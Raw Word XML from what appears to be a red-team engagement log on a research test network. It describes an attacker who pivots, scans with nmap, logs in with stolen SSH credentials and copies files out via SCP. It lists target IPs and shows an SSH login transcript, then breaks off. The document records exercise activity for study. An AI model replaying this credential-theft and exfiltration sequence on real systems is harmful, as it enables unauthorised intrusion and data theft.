    <w:p w14:paraId="63E371A4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x1e\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00admin\x00' (30 bytes)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278B8DFA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1E 00 00 00 12 00 00 00 00 00 00 00 06 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD26ACA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 06 00 00 00 00 00 00 00 61 64 6D 69 6E 00        ........admin.                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36579F59" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A88FC9C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544FE05C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175F14A6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 0                                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A7D502" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;finally                                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A38A1E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending quit                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F652F3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x002\x00\x00\x00' (8 bytes)                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D91B02" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 32 00 00 00                          ....2...                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEDE755" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">closing  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D1BC4" w14:textId="3D90C007" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="006C14C7" w:rsidP="00965965">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD1873D" w14:textId="7A5828B8" w:rsidR="00CE2C66" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="00CE2C66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc12600035"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>05/10/2019 – Nmap SSH SCP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="257BE8E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRPr="00FC027E" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc12600036"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Schedule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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475"/>
        <w:gridCol w:w="5865"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C14C7" w:rsidRPr="00FC027E" w14:paraId="16DAD63A" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1DA24208" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRPr="00FC027E" w:rsidRDefault="006C14C7" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>10:26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="74CBE028" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRPr="00FC027E" w:rsidRDefault="006C14C7" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Multiple Performers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4C6341A9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRPr="00FC027E" w:rsidRDefault="006C14C7" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Nmap SSH SCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F78551B" w14:textId="07B7C86B" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc12600037"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10:26 -- Multiple Performers -- Nmap SSH SCP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="0E08BFF7" w14:textId="7523A58E" w:rsidR="006C14C7" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The attacker first accessed ta51-pivot-1 on the target network.  From there, nmap was used to map out the surface area on the target network.  The attacker then connected to various identified hosts using stolen credentials via SSH.  A file from the admin user’s home directory was exfil’ed via SCP from each target back to ta51-pivot-1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D373560" w14:textId="37E8D4EE" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_376r46k618n3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="75" w:name="_Toc12600038"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="5A0772FF" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta51-pivot-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.149</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Ubuntu 16.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD399A5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-cadets-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.51</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FreeBSD 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BA3631" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-theia-target-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.110</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Ubuntu 12.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBDDB54" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-trace-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.118</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Ubuntu 14.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A940414" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-fivedirections-3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.109</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Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6D2F96" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta51-pivot-3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.234</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Ubuntu 18.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C7496F" w14:textId="4054C4F4" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_2alec2hcz7q4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="77" w:name="_Toc12600039"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="56590D27"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Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A6550" w14:textId="1D3789E6" w:rsidR="00A351B2"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SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA5CF12" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc12600040"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="2A05B244" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3794B48B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/backup/20190506/deliverables/debug/windows/x64$ ssh admin@128.55.12.149</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDF0A2B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The authenticity of host '128.55.12.149 (128.55.12.149)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D95ED03" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ECDSA key fingerprint is 96:21:91:4e:ed:61:d6:9e:d8:ab:ed:0a:4b:41:44:7f.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB25A50" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343FA12E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Warning: Permanently added '128.55.12.149' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08172DC4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.149's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4379B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-87-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A04BB3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7784E81E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Documentation:  https://help.ubuntu.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C9BBC9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Management:     https://landscape.canonical.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1635F5A6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Support:        https://ubuntu.com/advantage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1D9CCD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E15207E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>232 packages can be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C4835" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>135 updates are security updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBAE934" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00914277" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FAF8926" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C2D604D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The programs included with the Ubuntu system are free software;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D46C0D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>the exact distribution terms for each program are described in the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2741EECA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>individual files in /usr/share/doc/*/copyright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27727A79" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD14B8C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114C20AA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>applicable law.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308DD554" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3DBA80" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-pivot-1:~$ date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7728A92C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Fri May 10 10:26:41 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEEF3AB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0306DC8A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
